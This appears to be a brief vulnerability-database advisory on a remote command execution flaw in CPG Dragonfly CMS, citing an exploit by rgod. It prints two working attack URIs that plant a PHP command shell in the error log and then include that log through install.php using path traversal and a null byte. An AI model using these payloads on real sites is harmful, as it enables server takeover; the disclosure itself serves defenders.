CPG Dragonfly CMS Remote Command Execution Vulnerability

CPG Dragonfly CMS Remote Command Execution Vulnerability

An exploit is not required.

Example URI has been provided:
http://www.example.com/[path]/error.php?<?passthru($_GET[cmd]);?>
http://www.example.com/[path]/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00

An exploit designed to leverage this issue was provided by rgod.

/data/vulnerabilities/exploits/cpg_dragonfly_exploit.php